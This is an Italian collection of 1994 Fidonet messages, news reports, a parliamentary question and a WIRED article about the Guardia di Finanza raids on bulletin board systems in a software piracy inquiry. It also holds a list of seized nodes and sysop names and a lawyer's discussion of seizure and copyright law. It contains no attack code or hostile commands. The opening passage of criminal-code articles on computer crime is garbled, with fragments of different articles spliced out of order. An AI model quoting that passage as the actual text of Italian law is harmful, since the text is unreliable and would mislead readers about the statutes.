sostituito dal seguente: Art. 10 1. 635-bis (Danneggiamento di sistemi informatici e telematici).Nell'articolo 621 del codice penale.qualita' di operatore di sistema. 3) da chi esercita anche abusivamente investigatore privato. informazioni o programmi. Se ricorre una o piu' circostanze di cui als econdo comma dell'art. in tutto o in parte.

Luca Spada e Walter .. procura a se o ad altri un ingiusto profitto con altrui danno. 2:331/301 Originally to Tutti Originally dated 12 May 1994. 0:49 Salve a tutti.Art. dischetti) o sigillandolo.033 ->Conf. e' consentita l'intercettazione del flusso di comunicazioni relativo a sistemi informatici o telematici ovvero intercorrente tra piu' sistemi. modem. stampanti.. --------------------------------------------------------------------------And now alcuni messaggi presi qua' e la' . salvo che ricorra taluna delle circostanze di cui al secondo comma o un'altra circostanza aggravante. pare. Domenico Pavone. perquisendo le abitazioni. Art. alterando in qualsiasi modo il funzionamento di un sistema informatico o telematico o intervenendo senza diritto con qualsiasi modalita' su dati.640. Sysop Italia" Originally by Vertigo.. La guardia di Finanza e' andata a casa di parecchi sysop Fidonet (e. anche non Fidonet) per accertamenti.Dopo l'articolo 266 del CPP e' inserito il seguente: Art. Il delitto e' punibile a querela della persona offesa. esaminando computer e dischetti e sequestrando materiale (computer. Luca Croci.Nei procedimenti relativi ai reati indicati nell'articolo 266. Conosco i nominativi di sysop solo del 331 visitati dalla finanza. informazioni o programmi contenuti in un sistema informatico o telematico o ad esso pertinenti.. 266-bis (intercettazioni di comunicazioni informatiche o telematiche).. sequestrando computer ed apparecchiature! Pare che la cosa sia avvenuta nell'ambito di un'inchiesta sulla pirateria avviata dalla procura di Pesaro e avente come indiziati due tizi di nome Paolo Paolorosso e Riccardo Cardinali (non sono certo al 100% dei nomi. Quanto sto per riferirvi e' alquanto frammentario e confuso perche' deriva da informazioni raccolte da piu' fonti al telefono e quindi non ho tutti i dettagli: il succo comunque e' che nella giornata di mercoledi' 11 maggio la guardia di finanza ha compiuto una serie di raid presso molte BBS Fidonet. ma cosi' mi hanno riferito). ovvero se il fatto e' commesso con abuso della qualita' di operatore di sistema. nonche' a quelli commessi mediante l'impiego di tecnologie informatiche o telematiche. La pena e' della reclusione da uno a cinque anni e della multa da lire seicentomila a tre milioni se ricorre una delle circostanze previste dal numero 1) del secondo comma dell'art. e' punito con la reclusione da sei mesi a tre anni e con la multa da lire centomila a due milioni. -------------------------MESSAGGI-----------------------------------------* * * * Forwarded from "SYSOP. tra i quali Alfredo Persivale.Chiunque. 11 1. Valentino Spataro. 640-ter (Frode informatica).

assolutamente sproporzionato sia agli elementi in possesso degli inquirenti e sia al tipo di reato contestato (non si riesce ad immaginare la portata delle azioni che. il 100% dei quali. nella quale ora non puo' piu' entrare. di perquisizioni minutissime in appartamenti ed aziende. Assisto con sgomento e meraviglia a quanto e' accaduto l'11 maggio scorso a molti amici e "colleghi" sysops di tante parti d'Italia. Tutti abbiamo sentito parlare di attrezzature elettroniche (a volte anche banali. si faccia avanti. ha dato la stura ad una serie di azioni istruttorie e misure cautelari davvero notevole. motivato dalla necessita' di sgominare un traffico di software duplicato. di sigilli poste ad ambienti di casa. Sysop Italia" Originally by Enrico Franceschetti. Ciao. 16:27 Ciao a tutti.Mascarin. l'impossibilita' di svolgere le consuete attivita' lavorative ad esso legate. Il blocco di un computer. e denegando ogni principio giuridico esistente. basandosi sul metro di quanto abbiamo visto. la sua asportazione. senza l'esistenza di sostanziali elementi di prova a loro carico. un vero e proprio blitz organizzato pensando di affrontare una organizzazione oliata e ben esperta nel crimine. Oggi mi incontrero' con un po' di persone coinvolte nella cosa e cercheremo di fare il punto della situazione. ne sono certo. dovrebbero venire attuate quando di mezzo vi sono organizzazioni criminali ben piu' pericolose ed attive). In sostanza.. occorre dimostrare di essere innocenti. Un provvedimento di un giudice pesarese. comportano un ingiusto danno da sopportare. Vengono di fatto inferti a privati cittadini. Se qualcuno ha informazioni piu' precise in merito. 2:335/212. Per non parlare poi delle spese legali che dovranno essere affrontate da chi ha ricevuto avvisi di garanzia. e sopportare in silenzio le conseguenze della propria . Insomma.. ma credo che la cosa sia estesa anche altrove in Italia. Ma cio' e' plausibile? Quale professionista ed "operatore del diritto" rimango colpito dal modo con cui questa serie di azioni sono state eseguite.033 ->Conf. si sgonfieranno come neve al sole. Ho parlato telefonicamente con Domenico. danni notevolissimi di carattere economico e morale. Non si ha idea del motivo per cui queste persone (sulle cui BBS non era presente materiale piratato) siano state coinvolte nell'inchiesta. il quale riferisce che hanno addirittura messo i sigilli alla stanza contenente computer e dischetti. Credo sia superfluo invitare tutti alla massima cautela e collaborazione. come segreterie telefoniche o apparecchi autocostruiti) poste sotto sequestro. non prima pero' di aver tenuto in ambasce famiglie intere e costretto le medesime a notevoli esborsi economici. --V-* * * * Forwarded from "SYSOP.1 Originally to Tutti Originally dated 13 May 1994.

saranno ora molto piu' attenti e cauti nelle loro attivita'. con infiltrazioni.033 e crash agli NC/NEC. 2:331/301 Originally to Tutti Originally dated 13 May 1994. lungi dall'aver colpito veri "pirati" ha ottenuto l'unico effetto di terrorizzare decine di onest'uomini e far scappare (distruggendo ogni materiale illegale) i professionisti della copia i quali. Ciao. da mesi. Franco Mulato sta cercando di organizzarsi in questo senso. Certo. So che da tempo un'altra struttura pubblica di investigazione stava preparando con accuratezza una indagine sulle Bbs pirata. A chi giova tutto cio'? La risposta e' di difficile individuazione. 11:39 Copia in SYSOP. Ugualmente non puo' non notarsi come la telematica amatoriale in Italia sia davvero strumento "potente" per la diffusione e la circolazione delle idee. preferendo troppo spesso sequestrare e sigillare piuttosto che cercare di comprendere cosa si trovavano davanti. Alcune notizie sparse sulla faccenda dei sequestri. si stava raccogliendo il materiale necessario per inchiodare i veri responsabili di questo traffico illecito alle proprie responsabilita'.033 ->Conf. a tutti e' stato sequestrato il materiale informatico. messi in allarme da questo inutile polverone. inviandogli copia del documento via fax al numero 057438816 ed allegando un recapito telefonico a VOCE. strangolati invece dalle elevate tariffe dei servizi pubblici (Videotel in testa). 2) Occorre immediatamente organizzarsi per cercare legali in loco (Pesaro). nonche' la scarsissima preparazione tecnica denotata dalle varie "squadre" di finanzieri che si sono mosse in tutto il paese. l'intervento clamoroso di questo magistrato. Enrico * * * * Forwarded from "SYSOP. Con la sola eccezione di Walter Mascarin e Michele Fadda. Forse come in nessuna altra parte del mondo in Italia le "reti" amatoriali conservano uno spirito appunto "amatoriale" che le rende disponibili facilmente ad una grande platea di utenti. a quanto mi risulta. Ma non basta. Allo stato non sappiamo ancora quali sviluppi attenderci: speriamo solo di non essere costretti ad ammettere che il paese che una volta era la culla del diritto e' divenuto oggi soltanto un paese di indagati ed inquisitori."presunta colpevolezza". per discutere della faccenda. . Sysop Italia" Originally by Vertigo. Avvertite tutti coloro che hanno ricevuto avviso di garanzia di mettersi in contatto con Franco Mulato. portandolo via o sigillando i locali in cui era contenuto. contatti. Ora. Qualcuno si e' gia' mosso personalmente (Luca Spada ha preso un avvocato pesarese). appostamenti. scusate la telegraficita' 1) Ieri sera qui a Milano ci siamo incontrati in parecchi tra sysop coinvolti e non. non puo' sfuggire la grossolanita' dell'intervento operato e la sua durezza.

teniamoci in contatto telefonicamente.) . Si puo' parlare di copie o simili cose. Ciao. --V-(RC) * * * * Forwarded from "SYSOP. ( no altre visite.. Sysop Italia" Originally by Sandro Gasparetto. 2:334/201 Originally to All Originally dated 14 May 1994...033 * Crossposted in NETSYSOP. Nel dubbio ho interpellato il mio avvocato. e con me non si esprime in termini oscuri.033 ->Conf. 21 a firma di Claudio Gerino che descrive l'accaduto..se il PC e' legato ad una attivita' (hardware o software) non hanno assolutamente il potere di fermare questa attivita' commerciale (se non temporaneamente).) a favore di chi e' gia' stato coinvolto e di chi lo sara' prossimamente.. 5) Occorre cercare di organizzare una specie di sottoscrizione per raccogliere qualche soldo per le spese (avvocati etc. Lui conta di fare ottenere velocemente il dissequestro al mio amico Gianni. per cui con un buon avvocato si puo' fare in modo che prelevino quanto serve per la loro inchiesta. . per cui mi fido di quello che mi ha detto. Il mio avvocato e' pure un amico da decenni (andavamo a scuola insieme). L'impressione comune e' che la cosa procedera' anche nei prossimi giorni con nuovi raid e sequestri..Hanno un ordine esecutivo. . possono fare quasi di tutto. 20:19 * Crossposted in SYSOP.. senza pregiudicare il proseguimento della attivita'.. ci stiamo organizzando per stendere il testo di un'interpellanza parlamentare sull'accaduto che dovrebbe essere inoltrata dal radicale Roberto Cicciomessere nei prossimi giorni. per cui non e' possibile fermarli o opporsi. Non ho visto finora riferimenti su altri quotidiani. Sede e dettagli ancora da definire. 6) Su "La Repubblica" di oggi e' apparso un articolo a pag. 4) Io e la Folletta.Arrivano con un mandato. partendo da indirizzi trovati a caso. ma mi ha sempre aiutato.3) Domenica pomeriggio a Bologna ci sara' un incontro straordinario per discutere della faccenda. Ma ora dovrebbe essere tutto finito..334 Per fortuna non sono venuti da me (ancora). ma.l'eventuale sequestro dovrebbe essere di breve durata. e gli ho chiesto come comportarmi.Secondo lui ( e' in contatto con un altro avvocato di Pesaro) l'inchiesta e' stata "a campione". Chi avesse materiale da sottoporre o proposte me le faxi in ufficio (fax 02-780472). . il mio numero d'ufficio e' 02-76001713. Nel mucchio hanno preso anche gente che non c'entra niente. . . su proposta di Pasquini.

2:331/301 (Mercoledi Maggio 18 1994 19:57) Tutti ANSA: altri 14 ! Appena arrivato! :-( Torino. accendi subito un lumino al tuo Santo preferito. avvalendosi di collegamenti telematici con esperti americani. con un DIR /s(ubdirectories) /h(idden).Lui pensa che l'andazzo di usare metodi "terroristici e vessatori" dovrebbe smettere. Pesaro. Napoli. quattro apparecchiature per l'utilizzo di linee telefoniche. 18 Mag 19:20 INFORMATICA: DENUNCIATI IN TUTTA ITALIA 14 "PIRATI" Quattordici "pirati informatici" italiani che. prendetela come uno sfogo. "La tecnologia utilizzata dai pirati . 13690 floppy disk contenenti software illecitamente duplicato. I cattivi. Savona. b) di stampare la directory del tuo hard disk (per esempio. non ha reso noto i nominativi degli indagati. di 'call card' contraffatte per usufruire delle reti telefoniche private nordamericane e dei piu' avanzati personal computer". sono stati denunciati a piede libero dal nucleo regionale di polizia tributaria della Guardia di Finanza. Sysop Italia Vertigo. dal nome delle subdirectories o dei programmi. * * * * Area From To Subj : : : : Sandro SYSOP. se no procedono al sequestro del computer (quale cosa che servi' a commettere il presunto .EXE e simili. 27 modem per collegamenti tramite linee telefoniche. ma soltanto le citta' dove sono stati fatti i sequestri: Torino.. La gente che lavora dovrebbe non essere piu' criminalizzata di una finanza che tiene in ostaggio una intera classe sociale. se hai tutti programmi regolarmente acquistati bene. Nell'operazione e' stato sequestrato materiale complessivo per un valore di circa quattro miliardi di lire: 17 personal computer. contenenti files . se ne trovano di non originali. arrivano e ti chiedono: a) di vedere i tuoi dischetti. Poirino (Torino). li identificano e ti chiedono le licenze originali. perche' sono guai. Genova. bye. li mettono in uno scatolino e li sequestrano.033 ->Conf. Sesto san Giovanni (Milano). otto dischi CdRom. Quest'ultima e' una mia considerazione. che sta ancora completando le indagini. manuali di istruzione per programmi e componenti per elaboratori elettronici. Terni. che si sono trovati di fronte a soggetti utilizzatori di comunicazioni via satellite. muniti di mandato di perquisizione e sequestro. sottraevano aoftware ai produttori e poi li commercializzavano in Italia a prezzi irrisori. La Guardia di Finanza.e' detto in una nota della Guardia di Finanza .ha stupito gli stessi militari del nucleo regionale di polizia tributaria. e lui conta che tra non molto cambi. Pesaro e Pescara. (ANSA) Msg#: 2979 From: Il Conte Subj: risposte Rec'd Local Date: 26 May 94 00:34 Read: Yes Replied: No PRIMA DOMANDA: Se ti vedi spuntare la GdF a casa.

E se ti condannano ? E se la BSA o l'Assoft si costituiscono parte civile nel processo. e tutto finisce li'. non sa nulla di informatica e si rivolge ad un perito perche' esamini il materiale sequestrato e dica la sua. il sistema contenesse la indicazione (che non costituisce una prova. per chiedere il risarcimento dei danni ? * * * SECONDA PARTE DELLA DOMANDA Il vecchissimo PCTOOLS dell'88. ma un indizio) che l'utente ICS ha prelevato (in data --. rende del tutto fuori commercio un programma.sigillatura dello scatolo contenente i dischetti. potrebbero ritenere abusivi anche tali programmi. Per quanto riguarda la sussistenza o meno del reato.d. e poi ti diremo se il sequestro e' legittimo. e me l'hanno rigettato con una motivazione del tipo: vediamo il processo. dopo un paio di anni (almeno). * * * TERZA ED ULTIMA PARTE Nello spirito attuale di caccia alle streghe. Tribunale della Liberta' (o del riesame). * * * INSOMMA: QUAL'E' IL CONTENUTO DI 'STA BENEDETTA LEGGE ? Boh ! . visto che il risarcimento e' previsto solo per chi patisce una ingiusta detenzione e non per chi sta qualche anno senza computer e/o senza programmi lecitamente acquistati. dove e' allegata la DIR dell'HDD.di quali prove ritengono di avere. * * * L'Autorita' Giudiziaria. Altro che da ridere: ci sara' da piangere. il quale si trova ad avere numerosi e remunerati incarichi a spese dello Stato. . poverina. * * * Il sequestro si effettua mediante: . su cui viene apposta una striscia di carta con i timbri della P. c) non sono in grado di precisare se la GdF conosce l'esistenza dei programmi Public Domain o Shareware: volendo. vedi appresso. La GdF (o gli altri organi di Polizia Giudiziaria) redigono un verbale di sequestro. . aiutaci tu se prima non ti stracciano sti' leghisti del ca**o): sarebbe antipatico se. che vengono descritti nel verbale. ai fini che ci interessano. come sappiamo. che ne impediscono l'uso.sigillatura del computer. potrebbe rinviarti a giudizio.alle ore ---) un file contenente un programma abusivamente duplicato. dopo qualche anno. o perche' il fatto non sussiste ? Niente: ti dicono (forse) "scusi tanto". ad esempio.reato). stanno chiudendo le BBS (Costituzione. ti assolvono per non aver commesso il fatto.di quali fatti ti hanno incolpato. e trasmettono tutto all'Autorita' Giudiziaria. All'esito. ed allora comincerebbe a discutersi: .G. ne ho fatto uno. L'unico soggetto oggettivamente avvantaggiato di tale situazione e' il perito. ma non ne autorizza affatto la copiatura abusiva. * * * E se. e' perfettamente equivalente all'ultimo costosissimo game piu' o meno virtuale: il passare degli anni. * * * Contro il sequestro e' consentito il ricorso al c.

Basta vedere l'annunzio pubblicato dalla BSA qualche mese fa su MCMicrocomputer: una sorta di scheda per fare la spia. Essendo poco chiaro per un giurista. 1369. il quale cosi' dispone: "Chiunque abusivamente duplica a fini di lucro programmi per elaboratore o. che scopiazzare il software e' assai piu' grave (o socialmente riprovevole) che spegnere le sigarette sulla pancia dei figli che strillano troppo e vendere il crack ai quattordicenni stanchi della vita. agli occhi di un ingenuo osservatore alieno..000.000 se il fatto e' di rilevante gravita' ovvero se il programma oggetto dell'abusiva duplicazione. e denunciare (magari rimanendo anonimi) il conoscente.1. 633. detenzione a scopo commerciale o locazione sia stato precedentemente distribuito. L'unica norma punitiva applicabile ai programmi per elaboratore era. Avete mai visto. a). venduto o concesso in locazione su supporti contrassegnati dalla Societa' italiana degli autori ed editori ai sensi della presente legge e del relativo regolamento di esecuzione approvato con regio decreto 18 maggio 1942 n. e' stato introdotto l'art. Leg.)". importa. vendita.ha le idee chiare. distribuisce.L.vo n. ai medesimi fini e sapendo o avendo motivo di sapere che si tratta di copie non autorizzate.vo 29-12-1992 n. Si applica la stessa pena se il fatto concerne qualsiasi mezzo inteso unicamente a consentire o facilitare la rimozione arbitraria o l'elusione funzionale dei dispositivi applicati a protezione di un programma per elaboratore. * * * In ordine al contenuto della legge sul diritto d'autore (novellata dal D. o concede in locazione i medesimi programmi. A seguito della citata novella. diffonde. La pena non e' inferiore nel minimo a sei mesi di reclusione e la multa a L. 171 bis. mettero' a disposizione dell'area quanto e' a mia conoscenza (non ho un testo completo). vende o mette in vendita o pone altrimenti in commercio un'opera altrui o ne rivela il contenuto prima che sia reso pubblico." .000 a L.me compreso . l'art. e' soggetto alla pena della reclusione da tre mesi a tre anni e della multa da L. La condanna per i reati previsti al comma 1' comporta la pubblicazione della sentenza in uno o piu' quotidiani e in uno o piu' periodici specializzati. sezione II della Legge 22 aprile 1941 n. sino alla novella. 518).000. 171 lett. o di spaccio di droga davanti alle scuole ? Questo dovrebbe significare. che punisce chiunque : "riproduce. intitolata "Difese e sanzioni penali" (artt. 518/92. su qualche rivista o giornale.500. il testo novellato della legge e' davvero incomprensibile ai comuni mortali: cio' nonostante. recita in pubblico. una scheda di questo tipo per denunciare (che so io) i casi di violenza sui minori.Nel senso che siamo a livelli (anche di stupidita' ed ignoranza) seriamente preoccupanti. che detiene software illegalmente duplicato. importazione. o introduce e mette in circolazione nello Stato esemplari prodotti all'estero contrariamente alla legge italiana (. o la persona semplicemente antipatica. data la novita' della riforma ed il suo contenuto schifosamente atecnico (sia dal punto di vista giuridico che da quello informatico). 171 e 172). capo III. le norme incriminatrici connesse alla tutela del diritto d'autore erano contenute esclusivamente nel titolo III.6.. distribuzione. vende.000. nessuno dei tecnici del diritto . detiene a scopo commerciale. * * * Anteriormente alla novella di cui al citato D. trascrive.

fatta a fini di lucro. vendita. ed i primi ricorsi per cassazione. distribuzione. Per sapere . 171 bis: a) la abusiva duplicazione. che l'art. se non mi ingannano le dure pagine dei manuali di diritto penale digerite all'universita' (e. purtroppo.* * * Primo dubbio: vale il principio secondo cui una norma dettagliata (il nuovo art. riguardando fattispecie diverse ? Credo. Ai posteri l'ardua sentenza: aspettiamo di vedere le prime decisioni. giornalista assassinato dalla mafia. VOCCOLI Francesco (Rifondazione) Ai Ministri delle finanze. Seduta del 24 giugno 1994 NARDINI Maria Celeste. b) la importazione. era utilizzata da insegnanti per attivita di educazione alla pace e alla . importa. fondato da Giuseppe Fava. la banca dati centrale della rete telematica Peacelink: era pubblicizzata su tutte le riviste pacifiste. oppure le norme coesistono entrambe. di programmi per elaboratore ("Chiunque abusivamente duplica a fini di lucro programmi per elaboratore"). regolato da una nuova e specifica norma. o la locazione di programmi per elaboratore. era stata segnalata da RAI Televideo nell'ambito della rubrica "L'Italia antipiovra" e "Spazio civile" per l'impegno antimafia. sinceramente. 489 27-Giu-94 14:00 3626 G. aveva diffuso in tempo reale. delle poste e telecomunicazioni e dell'interno. o concede in locazione i medesimi programmi"). 171 bis) annulla la precedente norma generica (il vecchio art. anche ora). era stata segnalata da RAI Televideo nell'ambito della rubrica "Spazio civile" per i suoi collegamenti telematici con la ex Jugoslavia e per i soccorsi umanitari che si avvalevano di una banca dati specializzata dell'Italian consorzium of solidarity e di una struttura di volontariato dell'aria (elisoccorso Montecalvoli).Borrello I Roma --------------------------------------------------------------------INTERROGAZIONE PARLAMENTARE (a risposta scritta) Atti Parlamentari Camera dei Deputati.premesso che: in data 3 giugno 1994 e stata sequestrata la banca dati centrale della rete Peacelink in seguito ad una perquisizione ordinata da un magistrato di Taranto. e allora si' che ci sara' da ridere. ragion per cui l'Alto commissariato per i rifugiati ONU ne aveva chiesto la collaborazione per i soccorsi di emergenza. detiene a scopo commerciale. detenzione a scopo commerciale. 171 non sia piu' applicabile al software. vende. a fini di lucro. da parte di chi sa od ha motivo di sapere che si tratta di copie non autorizzate ("ai medesimi fini e sapendo o avendo motivo di sapere che si tratta di copie non autorizzate. era il supporto telematico per la realizzazione del giornale "I Siciliani". quindi. distinguere due tipi di comportamenti penalmente sanzionati dal citato art. Si dovrebbero. le informazioni sulla conferenza ONU di Vienna sui diritti umani. lo scorso anno. distribuisce. 171).

prima che si verifichino altre perquisizioni e sequestri che -fallendo clamorosamente l'obiettivo. Scusate le omissioni e imprefezioni. FAX/segreteria 099 365812. in relazione alla prevenzione e alla repressione della criminalita informatica e telematica. sita in Statte (TA). richiede l'invio di tutte le infos possibili.legalita.org Originally to all Originally dated 16 May 1994. se i Ministri in indirizzo non ravvisino in un simile episodio la spia per una scarsa professionalita e non ritengano di avviare un'indagine sui livelli di preparazione specifica di tali apparati.L'avvocato Francesco Guida di Taranto. Fido: -----Luca Spada Alberto Giovaninetti Luca Croci Ascanio Orlandini Paolo Borghesi 2:331/106-117-121 sequestrato tutto 2:331/103 sequestrato tutto 2:331/108 ? 2:331/203 solo perquisito 2:331/204 sequestrato tutto . quali azioni intendano intraprendere allo scopo di evitare che simili situazioni non abbiano piu a ripetersi.033 ->Conf.anche Peacelink. il bliz della banca dati centrale di proprieta di Giovanni Pugliese. a che scopo e se in tale indagine sia stata coinvolta -e per quale motivo. in particolare quella relativa al pacifismo e al contatto con le scuole era assoggettata a forme di controllo e -pare. nota per i meriti acquisiti nelle attivita sopra elencate.finiscano per colpire strutture di volontariato informativo che andrebbero al contrario promosse e sostenute. alla crescita di una coscienza pacifista e alla difesa dei diritti umani. che collabora con PeaceLink. ha costituito un gruppo di studio del problema. sul settimanale "Avvenimenti" in data 15 giugno 1994 appare che tale attivita. come intendano garantire alla banca dati della rete telematica Peacelink la ripresa di una attivita essenziale. se la Guardia di finanza di Taranto sia dotata di modem e se sia in grado di usarlo per compiere accertamenti sulle banche dati telematiche. e basato su una indagine promossa da un capitano della Guardia di finanza di Taranto che ha ritenuto sicure e affidabili voci viceversa fantasiose e infondate di uso di tale banca dati per diffondere a scopo di lucro programmi per computer copiati. 12:51 ** AGGIORNAMENTO ** Segue lista BBS visitati da GDF desunta da messaggi e telefonate. per quali motivi non sia stata fatta alcuna verifica via modem delle fantasiose voci giunte alla Guardia di finanza. 2:335/206@fidonet. nonche riconosciuta da piu parti.Gli avvisi di garanzia emessi sono stati 173. Sysop Italia" Originally by Felice Murolo.di interferenza da parte di uomini dei servizi poco prima che avvenisse l'attentato al giudice Falcone. * * * * Forwarded from "SYSOP. Notizie: . tale raccolta di informazioni non e stata verificata mediante collegamenti via modem dalla Guardia di finanza di Tarantose siano a conoscenza dei fatti citati. se attualmente i servizi di informazione stiano svolgendo un ruolo di acquisizione di notizie sulle reti telematiche. .

compreso negozio 2:332/400 sequestrato tutto 2:332/2-407-417-427 sequestrato tutto 2:332/418 sequestrato tutto 2:332/505 sequestrato tutto 2:332/617 sequestrato tutto 2:332/618 sequestrato tutto 2:333/203 sequestrato solo dischetti 2:333/707-708 ? 2:334/307 sequestrato Hard Disk 2:334/701 risparmiato. sequestrato tutto "Breakdown". non piu' bbs.3 sequestrato tutto 2:331/204. sequestrato computers sponsor 2:335/428 sequestrato tutto 2:335/503 convocato dai CC 2:335/514 convocato dai CC 2:335/512 sequestrato tutto 2:335/713 sequestrato tutto Non fido: ---------Vittorio Mori Curradini Giuseppe Paterno' Super pirata. sequestrato tutto "Il Tempio BBS".studio legale avv. anche comp. BBS chiusa 8 mesi fa.6 sequestrato tutto ?? sequestrato tutto 574 7-Lug-94 00:54 2949 V. 2:331/204. sequestrato tutto perquisito. Valerio . azienda 2:331/320 solo perquisito 2:331/323 solo perquisito 2:331/331 sequestrata la stanza del computer! 2:331/334 sequestrato o sigillato 2:331/344 sequestrato tutto 2:331/347 sequestrato tutto 2:332/101 ? 2:332/115 sequestrato tutto 2:332/200 sequestrato tutto 2:332/300-301 sequestrato tutto 2:332/303 ? 2:332/306 ? 2:332/307 sequestrato tutto 2:332/313 ? 2:332/315 sequestrato tutto a casa sua (la bbs no) 2:332/316 sequestrato tutto 2:332/320 sequestrato tutto.Russo I Roma ----------------------------------------------------------------------------PeaceLink . sequestrato tutto non identificato. Terni Riccardo Cassotti Points: -------Borghesi Caruso Bisanti Ciao Felix ex fido.Guida Vi giro un mes ricevuto da Alessandro Marescotti in area AVVENIMENTI.Alfredo Persivale Michele Fadda Walter Mascarin Domenico Pavone Othmar Tschrepp Giulio Cipriani Valentino Spataro Franco Mulato Samuele Landi Max Morando Massimo Berni Roberto Nucci Alberto Tommasoli Riccardo Pizzi Alessandro Trebbi Lorenzo Lugli Fabrizio Carloni Massimo Sabbatini Alessandro Benvenuti Paolo Sinigaglia Marcello Ardini Mario Mure' Marco Venturini Auti Riccardo Iacobucci Mario Zambon Piergiorgio Ghezzo Gianni Bragante Paolo Goria Andrea Contini Alberto Marcedone Marco Tomassoni Michele Scopelliti Giuseppe Giardina 2:331/302 sequestrato tutto.

non abbia richesto al capitano della Guardia di Finanza. dopo l'azione Hardware1 di Pesaro. non sono un avvocato. colpendo Giovanni Pugliese. Riporto di seguito il testo integrale dell'articolo che appare a pagina 29 del n. Sara' fatta a questo punto una nuova richiesta di dissequestro. L'insieme di tutte queste "coincidenze" CI FA FORTEMENTE SOSPETTARE sull'indipendenza e sulla reale spontaneita' dell'operazione. la documentazione di dissequestri gia' avvenuti nei giorni scorsi. . il cui numero dello studio e' 099/365812 (tel.Parrella USA Oakland CA ---------------------------------------------------------------------------Articolo su WIRED Magazine (Agosto 94). non piu' al Tribunale del Riesame ma al Gip. La fonte di tale accusa e' coperta dal segreto istruttorio.ricordo .-)) Particolari sulle motivazioni del mancato dissequestro si possono chiedere all'avv.e' del tutto assurda: Pugliese viene accusato di aver chiesto dalle 50 alle 200 mila lire a collegamento telematico per trasferire programmi commerciali. ha colpito tutti noi e . una piu' precisa verifica delle fonti (dal capitano ritenute altamente affidabili). adducendo motivazioni legali concernenti non piu' la non regolarita' dell'azione del PM ma la peculiare azione del BBS in termini di servizio la cui interruzione puo' causare danno alla comunita'.per conto di Parrella . il Tribunale del Riesame.08 del mensile WIRED Magazine. Alessandro 609 14-Lug-94 08:16 2962 B. Certo e' che l'avv. vorra' dire che l'operazione era ben congegnata e aveva un fine ben calcolato. Questo e' almeno cio' che ho capito nel sonno.. nonostante avesse avuto tutto il tempo di esaminare per bene la faccenda dato che sussisteva lo sciopero degli avvocati.il cuore di PeaceLink: piu' in alto non potevano mirare. prima di accoglierla e far eseguire la perquisizione da Pugliese. .2. con relative motivazioni. Ragion per cui il nostro atteggiamento sta passando dal piano della cautela a quello piu' "politico" del sospetto sulle finalita' che mal si celano dietro a questa manovra che. Se a settembre PeaceLink sara' piu' debole. Mi sono espresso in termini forse infelici. Ciao. non ha voluto ficcardi in una faccenda forse ritenuta troppo complicata ed inedita da riesaminare. tanto da ritenere che il contributo di 100 mila lire fornito dal Liceo Classico Archita di Taranto e dall'Istituto Professionale Archimede "per l'uso del BBS" possano essere messi in relazione con l'accusa specifica che . Cio' che e' grave e' che la Guardia di Finanza non l'abbia verificata prima di passarla al Pubblico Ministero e che il Pubblico Ministero Benedetto Masellis..non dimentichiamolo . Circa le motivazioni del non dissequestro.Ciao Valerio! Ieri notte mi chiedevi ..informazioni piu' particolareggiate sui motivi che hanno indotto il Tribunale di Taranto a rifiutare il dissequestro del BBS host di PeaceLink.Francesco Guida. cioe' quello di Pugliese. tal Cazzato. Il Tribunale del Riesame ha evidenziato una cattiva volonta' di fondo..Guida vorrebbe avere da qualcuno che in Italia ha un po' di dati./fax).

Parrella USA Oakland CA 602 ----------------------------------------------------------------------------Sicurezza e telematica. sysops in Italy awoke facing machine guns. Activists hope that when the dust clears from the raids. we'll verify it as soon as possible. reminiscent of the infamous "Operation Sundevil" in the United States in 1990." said Stanton McCandlish of the Electronic Frontier Foundation. "Even in Italy. president of the Fidonet Association of Italy. -. vengono realizzati grazie all'uso di una fitta rete di telefoni cellulari: si e' forse criminalizzato la SIP per questo? . Italian courts were beginning to return the seized equipment.(NB: il pezzo e' stato chiuso in redazione il 7 giugno). the Pesaro prosecutor managing the investigations. code-named "Operation Hardware 1. as does Peacelink. according to Gaetano Savoldelli Pedrocchi. another system whose main node was similarly raided several weeks after the Fidonet seizures. Police officials removed computer hardware. raided 119 Fidonet Italia bulletin board systems. dagli omicidi dei magistrati allo spaccio di eroina e cocaina. "This is a prime example of what happens when ignorant law enforcement butts heads with the online world." Unfortunately. audiotapes. Italian style Crackdowns on Italian BBSes demonstrate that US law enforcement agencies are not alone in dealing with Net crimes by shutting down as much of cyberspace as they can." Pedrocchi said in an interview with an Italian magazine. The two may have used Fidonet Italia nodes to orchestrate the distribution of illegally copied software. ----------Hacker Crackdown. Early in the morning of May 11. and other magnetic storage media. Most likely. police officials simply raided each Fidonet node named on a public phone-list held by the two suspected software pirates. I piu' efferati crimini mafiosi." targeted a suspected software piracy ring allegedly run by two users of a Pesaro-based BBS. "The software pirates are a lot more hidden than an obviously public network like Fidonet. is so important. disks. the relatively new Italian online community will unify to lobby for electronic civil rights laws by forming an Italian EFF-type organization." said Franco Mulato. US correspondent to Agora Telematica. Software piracy has become a national sport in Italy. not to mention updating the law.David Pescovitz 603 10-Lug-94 17:51 1370 B." At press time. "This is why getting police and other agencies up to speed. Italy's equivalent to the Well. "The protection of civil rights is not a negotiable issue in a modern democracy. the Italian laws that were updated earlier this year to prohibit software piracy and copyright infringement continue to hold sysops responsible for any activity on their systems. Fidonet prohibits the distribution of copyrighted software and secret passwords." Pedrocchi said. "We acted after precise information about the activities of a specific databank: if some operators have nothing to do with the charges. acting on a warrant." said Bernardo Parrella. electronic citizens are showing up. "The crackdown needed to be done. Italian police. The police operation. answering machines.

pero'. quindi. E.. Agi. perfino bombe) viaggiano su aerei e furgoni dei servizi postali mondiali: si e' forse deciso d'incriminare gli addetti a tali servizi? Certo.R. le notizie di ieri sulla "pericolosit delle reti informatiche internazionali" non sono invenzioni giornalistiche. abbiamo prima di tutto il dovere di allargare il dibattito. con il corollario che l'unica telematica affidabile sia quella "privata" commerciale o dello stato. Berghella che rispondera' direttamente al tuo messaggio nonostante il mio nome in testa. Un documento ufficiale. come quello di far temere che la telematica amatoriale sia un rischio per la sicurezza. esistono diverse Bbs che operano come ""piazzisti" di eroina... Alcune cose sono probabilmente vere (mi risulta che inusa.. Per quanto riguarda il fatto che la notizia sia uscita sui giornali.Sia il crimine organizzato che la deliquenza comune fanno largo uso delle tecniche di intercettazione delle radio-frequenze della polizia: si e' mai scritto che le Poste debbano essere colpevoli? Ogni giorno migliaia di lettere. In nome della sicurezza sociale. ma il volume e' in stampa.. sono qui con il dott. la proprieta' di essi e la loro gestione esclusiva. Adnkronos) del documento.Pasquini I Civitavecc 601 ---------------------------------------------------------------------------Salve.Gerino I Roma ------------------------------------------------------------------------------INFORMAZIONE E SICUREZZA Purtroppo. il cui testo completo sara' disponibile pero' solo a settembre. esaminando con attenzione 